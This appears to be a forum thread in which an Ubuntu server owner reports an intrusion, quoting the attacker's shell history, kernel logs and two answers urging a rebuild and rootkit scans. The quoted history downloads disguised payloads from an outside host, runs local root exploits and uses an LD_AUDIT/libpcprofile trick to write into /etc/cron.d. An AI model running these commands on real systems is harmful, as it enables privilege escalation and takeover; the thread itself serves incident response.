Ubuntu Server hack

Question

I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file:

w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0  
dpkg -S /lib/libpcprofile.so 
ls -l /lib/libpcprofile.so 
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh 
vi a.sh 
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh .  ..  a.sh  .cache  ubuntu10.sh  ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd

The system is in a jail. Does it matter in the current case? What shall i do?

Thanks for everyone!!

I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

---

I installed rkhunter and unhide as well. I ran "unhide sys" command and it resulted 1 hidden process. Now I'm running rkhunter... OK.

rkhunter -c resulted some warnings:

• in the jail: Checking if SSH root access is allowed [ Warning ] Checking for syslog configuration file [ Warning ]

  Performing filesystem checks Checking for hidden files and directories [ Warning ]

• host system: Performing filesystem checks Checking /dev for suspicious file types [ Warning ] Checking for hidden files and directories [ Warning ]

I found in dmesg and syslog that the hacker tried something to do with irda:

• syslog:

Feb 28 22:48:41 i386 kernel: [4180166.230061] irda_init()
Feb 28 22:48:41 i386 kernel: [4180166.230077] NET: Registered protocol family 23
Feb 28 22:48:46 i386 kernel: [4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: Called
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 22:49:12 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 22:49:33 i386 kernel: [4180218.465341] can: controller area network core (rev 20090105 abi 8)
Feb 28 22:49:33 i386 kernel: [4180218.465413] NET: Registered protocol family 29
Feb 28 22:49:33 i386 kernel: [4180218.493398] can: broadcast manager protocol (rev 20090105 t)
Feb 28 23:00:49 i386 kernel: [4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:13:48 i386 sudo: pam_sm_authenticate: /home/i is already mounted
Feb 28 23:17:01 i386 CRON[10126]: (root) CMD (   cd / && run-parts --report /etc/cron.hourly)
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: Called
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: username = [i]
Feb 28 23:36:29 i386 sudo: pam_sm_authenticate: /home/i is already mounted

• dmesg:

[4180166.230061] irda_init()
[4180166.230077] NET: Registered protocol family 23
[4180171.242169] ioctl32(2.6.31:4726): Unknown cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) on /dev/pts/0
[4180218.465341] can: controller area network core (rev 20090105 abi 8)
[4180218.465413] NET: Registered protocol family 29
[4180218.493398] can: broadcast manager protocol (rev 20090105 t)
[4180894.035222] ip_tables: (C) 2000-2006 Netfilter Core Team

Answer 1

Take your system down, back it up for future forensic analysis, then re-build from scratch and restore any needed data from a known good backup. Anything short of that leaves the possibility of latent malicious code being put to use.

Answer 2

You could try to replicate what the hacker did and see if it could succeed at some point (did he manage to copy that "exploit" file in the cron scripts?). You probably want to run rkhunter to check if your rooted or not, but it could hide somewhere else.